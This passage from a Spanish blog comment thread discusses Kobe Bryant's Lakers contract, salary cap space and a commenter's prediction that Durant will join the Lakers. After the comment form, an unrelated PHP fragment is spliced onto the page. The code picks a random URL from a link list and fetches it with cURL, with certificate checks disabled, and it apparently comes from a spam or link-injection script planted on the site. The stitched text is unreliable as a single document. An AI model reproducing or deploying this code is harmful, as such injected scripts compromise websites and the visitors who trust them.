    Si te la he contestado, si todos acuerdan jugar por el minimo es un fraude, pero si 2 se ponen de acuerdo y solo se rebajan un poco el sueldo no lo veo mal. Los 5 ó 6 que me has puesto, aunque quisieran no se pueden poner de golpe a la vez, no habría espacio salarial en ningun equipo para tanto, tambien hay que fichar profundidad de banquillo.

    15 es lo que yo estimo a nivel personal. No he utilizado ninguna regla trigonometrica para calcularlo. Con 15 kilos al año, Kobe sigue estando en el Top 20 de mejores pagados y te aseguras no cagarla tanto en caso de que tras su lesion vuelva mal y permite como ya he dicho mas margen para rodearlo de gente buena, aunque como parece, a Lakers no le importa esto, la sensación al renovarlo por 25 kilos es que lo que buscan es darle una recompensa a Kobe y no pelear por los anillos en estos 2 años.

    De todas formas, si consiguen hacer un equipo en los próximos 2 años que les permita pasar de primera ronda y dar algo de guerra, ya sería un exito, y seré el primero en reconocerlo.

    Y por cierto, apuntad esto que voy a decir en los anales del blog. Estoy absolutamente convencido que si Durant no se muere o no tiene graves lesiones, en la 15-16 ficha como agente libre por Lakers y se convierte en el heredero de Kobe. Si alguna casa de apuesta paga dinero por esta suposición ahora mismo, metere dinero, estoy convencido.

      Citar

  36. Denise dice:
    #36

    Denise:

    Y por cierto, apuntad esto que voy a decir en los anales del blog. Estoy absolutamente convencido que si Durant no se muere o no tiene graves lesiones, en la 15-16 ficha como agente libre por Lakers y se convierte en el heredero de Kobe. Si alguna casa de apuesta paga dinero por esta suposición ahora mismo, metere dinero, estoy convencido.

    Perdon, en la 15-16 no, en la 2016-17 quiero decir.

      Citar

  37. nba dice:
    #37

    No hay que rasgarse las vestiduras por la cantidad de la renovacion de Kobe, teniendo en cuenta que Mr. Pringles va a seguir al mando de este barco sin rumbo que son ahora los Lakers…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>